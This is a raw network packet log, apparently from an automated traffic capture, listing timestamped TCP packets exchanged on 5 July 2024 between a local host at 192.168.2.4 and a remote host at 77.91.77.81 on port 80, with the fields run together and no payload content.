                                                                Jul 5, 2024 04:36:13.571162939 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571186066 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571193933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571228027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571229935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571229935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571238995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571249962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571269035 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571315050 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571348906 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571397066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571424961 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571435928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571464062 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571471930 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571475029 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571486950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571497917 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571506977 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571506977 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571532965 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571533918 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571553946 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571583986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571659088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571669102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571676970 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571696043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571707010 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571713924 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571717978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571733952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571734905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571747065 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571754932 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571775913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571805954 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571820974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571831942 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571841955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571855068 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571866989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571870089 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571877956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571890116 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571897984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571911097 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571916103 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571923971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571938038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571968079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.571983099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.571994066 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572002888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572014093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572031021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.572058916 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.572151899 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572161913 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572171926 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572182894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572195053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572200060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.572205067 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572216988 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572227955 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572230101 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.572237968 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.572267056 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.572293997 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623718023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623728037 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623738050 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623743057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623749018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623754025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623820066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623863935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623888969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623900890 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623908997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623923063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623934984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623948097 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623959064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623959064 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623959064 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623970032 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.623991013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.623997927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624016047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624023914 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624027014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624038935 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624047995 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624049902 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624062061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624072075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624082088 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624088049 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624094009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624106884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624118090 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624129057 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624131918 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624140978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624150991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.624154091 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624197006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.624197006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660537004 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660556078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660583019 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660593987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660605907 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660617113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660629034 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660641909 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660650969 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660676956 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660689116 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660701990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660715103 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660727978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660737038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660737038 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660739899 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660772085 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660793066 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660830975 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660842896 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660854101 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660866022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660885096 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660885096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660898924 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660912991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660914898 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660923958 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660938025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660954952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660976887 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.660978079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660990953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.660998106 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661003113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661019087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661035061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661046982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661053896 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661058903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661084890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661128998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661189079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661201954 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661211967 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661222935 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661235094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661240101 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661256075 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661267996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661281109 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661288023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661288023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661295891 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661307096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661322117 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661323071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661334991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661349058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661360979 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661374092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661374092 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661389112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661401033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661401033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661411047 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661432981 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661477089 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661484003 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661490917 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661504030 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661515951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661520958 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661529064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661542892 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661550999 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661575079 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661628008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661669970 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661680937 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661693096 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661705971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661722898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661735058 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661748886 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661775112 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661786079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661799908 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661808014 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661813021 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661825895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661827087 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661839008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661854982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661859989 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661868095 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661883116 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661899090 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661920071 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661941051 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.661942959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661956072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661968946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661984921 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.661995888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662007093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662015915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662040949 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662062883 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662070990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662082911 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662095070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662132978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662132978 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662175894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662189007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662203074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662214041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662225008 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662226915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662256002 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662261009 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662273884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662292957 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662314892 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662348986 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662359953 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662370920 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662384987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.662395954 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662435055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.662435055 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.710820913 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710846901 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710856915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710910082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710913897 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.710921049 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710931063 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710941076 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.710993052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.710993052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.710993052 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711038113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711049080 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711059093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711070061 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711083889 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711082935 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711127996 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711152077 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711165905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711174965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711183071 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711189985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711191893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711194038 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711221933 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711263895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711276054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711308956 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711355925 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711366892 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711376905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711385965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711405993 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711416960 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711421013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711427927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711438894 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711442947 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711450100 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.711477041 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.711505890 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750610113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750636101 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750638962 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750691891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750699997 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750711918 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750724077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750727892 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750765085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750776052 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750782013 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750782967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750827074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750828028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750828028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750838995 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750853062 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750869989 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750895023 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.750988007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.750998974 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751008987 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751027107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751034021 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751044989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751051903 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751056910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751059055 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751065969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751101017 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751111984 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751121998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751121998 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751122952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751164913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751164913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751218081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751230001 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751240015 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751269102 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751298904 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751352072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751362085 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751372099 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751382113 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751393080 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751409054 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751409054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751425028 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751434088 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751454115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751483917 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:13.751494884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:13.751506090 CEST804973177.91.77.81192.168.2.4
